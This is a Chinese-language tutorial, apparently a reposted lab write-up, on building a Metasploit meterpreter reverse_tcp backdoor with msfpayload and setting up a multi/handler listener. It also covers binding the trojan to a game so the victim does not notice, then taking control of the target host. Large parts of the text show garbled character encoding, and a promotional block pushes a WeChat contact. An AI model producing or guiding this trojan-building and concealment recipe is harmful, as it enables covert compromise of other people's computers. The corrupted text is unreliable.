天天短訊！Kali滲透Windows服務(wù)器

這個實驗主要讓我們學(xué)習(xí)漏洞掃描技術(shù)基本原理，了解其在網(wǎng)絡(luò)攻防中的作用，掌握使用Kali中的Metasploit對目標(biāo)主機滲透，并根據(jù)報告做出相應(yīng)的防護措施。

本次實戰(zhàn)環(huán)境：Kali滲透Windows服務(wù)器

實戰(zhàn)步驟一

(資料圖)

本實驗通過利用kali進(jìn)行漏洞掃描，使用Metasploit對目標(biāo)主機進(jìn)行滲透測試，并根據(jù)報告做出相應(yīng)的防護措施，共分為3個實驗步驟，詳情如下；

1、 實戰(zhàn)步驟一：生成setup.exe后門程序，即木馬程序。

（1） 打開kali終端，輸入ifconfig， 得到本機ip為192.168.189.130。

如下圖：

（2）輸入以下命令，使用msfpayload生成名為setup的后門程序：

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖：

（3） 進(jìn)入setup.exe所在目錄，修改屬性：選擇“允許以程序執(zhí)行文件”。

如下圖所示：

（4） 終端中輸入首先msfconsole；然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊；輸入set LHOST 192.168.189.130來設(shè)置本地主機；然后輸入exploit -z -j開始監(jiān)聽，如下圖所示：

實戰(zhàn)步驟二

將上面生成的木馬程序與某個軟件進(jìn)行捆綁。

【----幫助網(wǎng)安學(xué)習(xí)，以下所有學(xué)習(xí)資料免費領(lǐng)！加vx：yj009991，備注 “博客園” 獲??！】

① 網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖?、?60+網(wǎng)安經(jīng)典常用工具包　③ 100+SRC漏洞分析報告?、?150+網(wǎng)安攻防實戰(zhàn)技術(shù)電子書?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫?、?超1800頁CTF實戰(zhàn)技巧手冊?、?最新網(wǎng)安大廠面試題合集（含答案）　⑧ APP客戶端安全檢測指南（安卓+IOS）

（1）可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個其他的某個安全軟件合并為一個軟件，這樣在運行軟件時兩個軟件同時運行，不會引起注意。在tools里面進(jìn)入名為exekunbang的文件，先打開ExeBinder.exe捆綁軟件。選擇第一個要合并的軟件，默認(rèn)選擇本軟件中自帶的小游戲程序：

點擊下一步，選擇第二個要捆綁的軟件，即之前生成的木馬程序setup.exe：

點擊下一步，選擇一個文件要保存的路徑:

繼續(xù)點擊下一步，開始捆綁軟件:

(2) 將捆綁后的軟件發(fā)送給目標(biāo)主機。

實戰(zhàn)步驟三

檢測目標(biāo)主機，對目標(biāo)主機進(jìn)行滲透測試。

（2） 目標(biāo)主機執(zhí)行程序后，在kali終端中的檢測程序會及時檢測到。在檢測到目標(biāo)主機運行程序后，后門程序會反向連接到msf，之后msf發(fā)起第二次攻擊（開始滲透），然后客戶端（后門程序）連接到服務(wù)端（msf）。輸入sessionss：

可以看到目標(biāo)主機的ip為192.168.189.129，

（2）再繼續(xù)輸入sessions -i 1,之后可以對目標(biāo)主機進(jìn)行一系列的操作。如輸入sysinfo可知道目標(biāo)主機的系統(tǒng)信息；輸入 getuid查看對方正在運行的用戶。

要養(yǎng)成多思考多總結(jié)的習(xí)慣，對實驗結(jié)果多去分析，這樣回收獲更多。比如如何利用kali進(jìn)行漏洞掃描；如何使用Metasploit對目標(biāo)主機進(jìn)行滲透測試；這些都是這次實戰(zhàn)后可以去思考的。

更多網(wǎng)安技能的在線實操練習(xí)，請點擊這里>>

關(guān)鍵詞：